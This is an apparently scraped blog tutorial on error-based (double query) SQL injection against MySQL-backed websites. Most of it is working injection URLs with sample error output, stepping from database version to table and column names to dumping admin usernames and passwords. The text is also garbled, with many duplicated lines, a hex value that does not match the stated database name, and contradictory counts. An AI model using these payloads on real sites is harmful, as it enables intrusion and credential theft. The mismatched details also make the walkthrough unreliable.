Error Based SQLi Tutorial
What do we need?
1. This tutorial.
2. Notepad. Because, using a pen and paper would take to long.
3. A vulnerable site.
4. I strongly suggest the hackbar for this! It helps you have a fine overlook at the code.
And is very easy to combine with this tutorial.
2. Notepad. Because, using a pen and paper would take to long.
3. A vulnerable site.
4. I strongly suggest the hackbar for this! It helps you have a fine overlook at the code.
And is very easy to combine with this tutorial.
part 1. Recognizing the injection.
— Checking vulnerability.
— checking column count.
— checking union statement.
— Checking vulnerability.
— checking column count.
— checking union statement.
Part 2. extracting information double query!
— Exploit codes
+ version
+ database
+ database user
+ table count
+ table names
+ column count
+ column names
+ Extracting information
— Output exploit.
+ version
+ database
+ database user
+ table count
+ table names
+ column count
+ column names
+ Extracting information
— Exploit codes
+ version
+ database
+ database user
+ table count
+ table names
+ column count
+ column names
+ Extracting information
— Output exploit.
+ version
+ database
+ database user
+ table count
+ table names
+ column count
+ column names
+ Extracting information
Lets start.
part 1. Recognizing the injection.
1. Checking vulnerability.
part 1. Recognizing the injection.
1. Checking vulnerability.
Enter ‘ behind the link
http://www.[site].com/page.php?id=1
http://www.[site].com/page.php?id=1′
If something like this pops up? Then it is vulnerable:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”5”’ at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”5”’ at line 1
1. Checking column count.
Code:
http://www.[site].com/page.php?id=1+order+by+1–+- [no error]
http://www.[site].com/page.php?id=1+order+by+99–+- [!!error!!]
http://www.[site].com/page.php?id=1+order+by+2–+- [no error]
http://www.[site].com/page.php?id=1+order+by+3–+- [no error]
http://www.[site].com/page.php?id=1+order+by+4–+- [error]
http://www.[site].com/page.php?id=1+order+by+1–+- [no error]
http://www.[site].com/page.php?id=1+order+by+99–+- [!!error!!]
http://www.[site].com/page.php?id=1+order+by+2–+- [no error]
http://www.[site].com/page.php?id=1+order+by+3–+- [no error]
http://www.[site].com/page.php?id=1+order+by+4–+- [error]
Why do i do order by 99?
To check if we don’t have to use a string injection.
If you do not get an error when u use order+by+99–+-
then you need string injection. (explained in basic tutorial.)
To check if we don’t have to use a string injection.
If you do not get an error when u use order+by+99–+-
then you need string injection. (explained in basic tutorial.)
Now we had this part. Lets move on to the union statement.
We know we have 3 columns now.
We know we have 3 columns now.
1. Checking Union select statement.
Code:
http://www.[site].com/page.php?id=1+union+select+1,2,3–+-
You do not get to see any content whit numbers.
Instead you get this error!
Instead you get this error!
Code:
“The used SELECT statements have a different number of columns”
We all know what that means.
This is where double query jumps in!
“The used SELECT statements have a different number of columns”
We all know what that means.
This is where double query jumps in!
Part 2. extracting information double query!
2. Exploit codes. Version
2. Exploit codes. Version
Finding the version:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now this is a hell of a code!
But it actually just says:
We select the version as char frim the database tables whit a limit 0,1 to get the first.
and we close whit and 1=1 which means true.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now this is a hell of a code!
But it actually just says:
We select the version as char frim the database tables whit a limit 0,1 to get the first.
and we close whit and 1=1 which means true.
Its hard for me to explain this full code.
i tried as simple as possible.
i tried as simple as possible.
2. Exploit Output. Version
Code:
Duplicate entry ‘~’5.0.91’~1′ for key 1
Code:
Duplicate entry ‘~’5.0.91’~1′ for key 1
The lucky part about this method is we get the answer in the error.
2. Exploit codes. Database
Finding the database:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Lets keep it easy.
This code does exactly the same as the one for version.
Only this one extracts database name.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Lets keep it easy.
This code does exactly the same as the one for version.
Only this one extracts database name.
2. Exploit Output. Database
Code:
Duplicate entry ‘~’Cyb3r_1′ for key 1
The error says the database is cyb3r_1.
Duplicate entry ‘~’Cyb3r_1′ for key 1
The error says the database is cyb3r_1.
This is relative to the database info:
1. Count off databases.
2. gather other database names.
1. Count off databases.
2. gather other database names.
1:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
If it says you have more then one database.
You can use this exploit to get the names 1 by 1.
You can use this exploit to get the names 1 by 1.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Its not hard to get more then one.
just keep increasing the limit 0,1.
if you do 1,1 you get next database in line.
if you do 2,1 you get second database in line.
just keep increasing the limit 0,1.
if you do 1,1 you get next database in line.
if you do 2,1 you get second database in line.
Not that hard at all.
2. Exploit codes. Finding database user
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This sais:
Select count and cast user() to gather user information from the current database.
Whit a limit.
http://www.[site].com/index.php?id=1 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This sais:
Select count and cast user() to gather user information from the current database.
Whit a limit.
If you understand the other exploits this one won’t be that hard.
2. Exploit Output. Finding Database User.
Code:
Duplicate entry ‘~’RS_user@localhost’~1′ for key 1
Code:
Duplicate entry ‘~’RS_user@localhost’~1′ for key 1
So the user is RS_user.
2. Exploit code. Finding table count.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE
table_schema=0xHEX)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Now take a close look at this code.
We need to change the database name we extracted before into hex.
Where the code sais 0xHEX
we have to do 0x and the hex obvious.
My database name was cyb3r_1
encoded in hex: 5265616c537465656c5f31
We can encode this using swingnote hex or if you have the hackbar.
Use that.
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE
table_schema=0xHEX)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Now take a close look at this code.
We need to change the database name we extracted before into hex.
Where the code sais 0xHEX
we have to do 0x and the hex obvious.
My database name was cyb3r_1
encoded in hex: 5265616c537465656c5f31
We can encode this using swingnote hex or if you have the hackbar.
Use that.
Exploit Code to execute:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE
table_schema=0x5265616c537465656c5f31)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE
table_schema=0x5265616c537465656c5f31)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
2. Exploit Output. Finding table count.
Code:
Duplicate entry ‘~’number_of_table(e.g 10)~1′ for key 1
The error says i have 3 tables. in most cases there is a lot more!
Code:
Duplicate entry ‘~’number_of_table(e.g 10)~1′ for key 1
The error says i have 3 tables. in most cases there is a lot more!
2. Exploit code. Finding table names.
This is going to happen one by one as before whit the database names.
We will have to use the limit again.
This is going to happen one by one as before whit the database names.
We will have to use the limit again.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Again look at the code close.
we need to hex the same part again:
0XHEX that’s the same as before.
again the database name mine was 5265616c537465656c5f31
we need to hex the same part again:
0XHEX that’s the same as before.
again the database name mine was 5265616c537465656c5f31
This time we also need to use the limits.
To get the table names.
To get the table names.
Watch at the part behind 0xhex in the code it says limit 0,1.
it is that one we need to increase.
same as before 0,1 first 1,1 second and 2,1 third.
I only have 3. if you have more keep increasing until you have all.
it is that one we need to increase.
same as before 0,1 first 1,1 second and 2,1 third.
I only have 3. if you have more keep increasing until you have all.
2. Exploit Output. Finding table names.
1:
2:
Duplicate entry '~'Tbl_shop'~1' for key 12:
Duplicate entry '~'Tbl_admin'~1' for key 13:
Duplicate entry '~'Tbl_news'~1' for key 1
So i have my 3 table names.
tbl_shop, tbl_admin, tbl_news.
The admin is interesting lets look inside!
The admin is interesting lets look inside!
2. Exploit code. Finding column count.
Well this is not so different from finding table count.
Only some parts change in the exploit code so here it is:
Well this is not so different from finding table count.
Only some parts change in the exploit code so here it is:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE
table_schema=0xHEXDB AND table_name=0xHEXTABLE)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This time we have 2 hexes.
This is annoying if you do not have a hackbar.
That’s why i suggested at top of this tutorial!
This is annoying if you do not have a hackbar.
That’s why i suggested at top of this tutorial!
Now look at the 2 parts in the tutorial.
1rst: 0xHEXDV
second: 0XHEXTABLE
1rst: 0xHEXDV
second: 0XHEXTABLE
My hex for db was: 5265616c537465656c5f31
My hex for tbl_admin is: 74626c5f61646d696e
My hex for tbl_admin is: 74626c5f61646d696e
full exploit code in my case.
To give you an overlook at things:
To give you an overlook at things:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE
table_schema=0x5265616c537465656c5f31 AND table_name=0x74626c5f61646d696e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2. Exploit Output. finding Column count
Duplicate entry '~'number_of_column(e.g 2)~1' for key 1
We have 2 columns.
Now to find out which ones?
2. Exploit code. Finding column names.
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0x5265616c537465656c5f31 AND table_name=0x74626c5f61646d696e LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
As you can see again we have our 2 hexes.
database name and table name.
but this time whit a limit at the end of the table name hex.
database name and table name.
but this time whit a limit at the end of the table name hex.
We will of cource need to increase that limit to get all names inside.
Limit0,1 and limit 1,1 should do for me i have only 2 columns.
Limit0,1 and limit 1,1 should do for me i have only 2 columns.
Which are:
2. Exploit Output. Finding column names.
2. Exploit Output. Finding column names.
1:
2:
Duplicate entry '~'user'~1' for key 12:
Duplicate entry '~'pass'~1' for key 1
2. Exploit code. Extracting names and passwords.
I will need your attention here for a second.
Read good what i poste below the exploit code.
I will need your attention here for a second.
Read good what i poste below the exploit code.
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(tbl_admin.user as char),0x27,0x7e) FROM `cyb3r_1`.admin LIMIT 0,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This is a very tense code.
You will have to add alot of your own information here.
You will have to add alot of your own information here.
at this part:
(SELECT concat(0x7e,0x27,cast(tbl_admin.user as char)
You will need to change the red parts to your own information.
The first word is the admin table i got.
the second part is the table name i gor which was user.
(SELECT concat(0x7e,0x27,cast(tbl_admin.user as char)
You will need to change the red parts to your own information.
The first word is the admin table i got.
the second part is the table name i gor which was user.
At this part of code:
FROM `cyb3r_1`.tbl_admin LIMIT 0,1) )
Here the first word is our current database.
the second word again our table name.
FROM `cyb3r_1`.tbl_admin LIMIT 0,1) )
Here the first word is our current database.
the second word again our table name.
And at end of this line we have a limit. the green.
You need to increase this limit until you have a hit or until you have all users inside the user column.
You need to increase this limit until you have a hit or until you have all users inside the user column.
We need to do exactly the same for pass.
only change user in the exploit code to pass!
only change user in the exploit code to pass!
2. Exploit Output. Finding admin credentials.
1:
2:
Duplicate entry '~'Cyb3rh4ck3r'~1' for key 12:
Duplicate entry '~'TeamIHC'~1' for key 1
Thats all
0 comments:
Post a Comment